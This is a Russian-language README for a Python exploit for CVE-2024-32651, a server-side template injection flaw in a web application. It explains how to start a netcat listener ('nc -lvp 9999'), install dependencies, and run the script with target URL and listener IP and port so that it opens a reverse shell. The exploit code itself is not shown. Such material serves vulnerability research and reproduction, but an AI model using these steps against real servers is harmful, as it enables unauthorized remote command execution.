
Серверная инъекция шаблонов (эксплойт)
Эксплойт для Server-Side Template Injection!!
Удаленное выполнение кода через Server-Side Template Injection (SSTI) в уязвимом веб-приложении
Этот эксплойт нацелен на веб-приложение, уязвимое к Server-Side Template Injection (SSTI). Используя эту уязвимость, злоумышленник может выполнять произвольные команды на сервере. Предоставленный скрипт на Python автоматизирует процесс эксплуатации, отправляя полезную нагрузку, которая инициирует обратную оболочку.
Чтобы воспроизвести уязвимость, запустите предоставленный скрипт Python против уязвимого веб-приложения. Убедитесь, что у вас запущен слушатель (например, nc -lvp 9999) для захвата соединения обратной оболочки.
Сохраните скрипт в файл с именем CVE-2024-32651.py.
Установите необходимые библиотеки Python, если они еще не установлены:
pip install requests beautifulsoup4
Для использования скрипта укажите следующие аргументы командной строки:
--url: Базовый URL уязвимого веб-приложения (например, http://10.10.10.10:5000).--port: Порт слушателя (например, 9999).--ip: IP-адрес слушателя (например, 10.10.50.22).--notification: (Необязательно) URL уведомления, если вы хотите использовать конкретный URL уведомления.python3 CVE-2024-32651.py --url http://<TARGET_URL> --port <LISTENER_PORT> --ip <LISTENER_IP> [--notification <NOTIFICATION_URL>]
Эта исправленная версия эксплойта основана на оригинальном эксплойте, опубликованном Заком Кросманом (zcrosman) с EDB-ID: 52027. Вы можете просмотреть оригинальный эксплойт здесь. Я благодарю Зака Кросмана за его вклад в сообщество безопасности.